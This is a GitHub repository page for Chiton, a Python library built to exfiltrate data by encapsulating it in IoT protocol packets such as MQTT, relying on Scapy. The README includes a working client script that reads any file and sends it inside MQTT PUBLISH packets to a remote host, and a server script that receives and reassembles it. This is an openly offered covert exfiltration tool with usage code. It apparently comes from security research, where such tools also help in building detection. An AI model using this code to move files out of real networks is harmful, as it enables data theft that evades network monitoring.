- Notifications
You must be signed in to change notification settings - Fork0
Chiton is a Python library to exfiltrate data encapsulating the data into IoT protocol’s packets
License
reverseame/chiton
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
Chiton is a Python library to exfiltrate data encapsulating the data into IoT protocol’s packets. The library allows you to encapsulate/de-encapsulate binary data into/from a protocol packets, and send/receive protocol packets to another host over Internet.
Chiton relies onScapy Project to encapsulate/de-encapsulate binary data. It can be installed by the following command:
$ python3 -m pip install scapy
Chiton is designed to be imported as a library in any project, and it follows the client/server model. The client is responsible of exfiltrate data:
importsysimportchiton.network.clientasclientimportchiton.protocol.mqttasmqttdefmain(filename):protocol=mqtt.MQTT(mqtt.PUBLISH)mqtt_client=client.Client(protocol,'192.168.1.40')data=read_file(filename)mqtt_client.send(data)defread_file(filename):withopen(filename,'rb')asf:returnf.read()if__name__=='__main__':main(sys.argv[1])
In this example, the file to exfiltrate is passed as argument to the script, which reads it as binary data. The chosen protocol in this case is MQTT with the packet type PUBLISH, and this protocol is used to create a client object willing to communicate with the host at address192.168.1.40. Finally, the data to exfiltrate is simply sent to the desired host calling the send function with the data as parameter, and the library handles the encapsulation of the data into the protocol’s packet payload.
importchiton.network.serverasserverimportchiton.protocol.mqttasmqttdefmain():protocol=mqtt.MQTT(mqtt.PUBLISH)mqtt_server=server.Server(protocol)data=mqtt_server.recv()write_file(data,'output.bin')defwrite_file(data,filename):withopen(filename,'wb')asf:f.write(data)if__name__=='__main__':main()
In the other side of the communication, the example server script should be running. The workflow is similar to the client, as the server needs to specify the protocol used for data transfer, and data is finally received. The library automatically de-encapsulates the packet payload to reassemble the original payload, ready to be saved into a file.
Licensed under theGNU AGPLv3 license.
About
Chiton is a Python library to exfiltrate data encapsulating the data into IoT protocol’s packets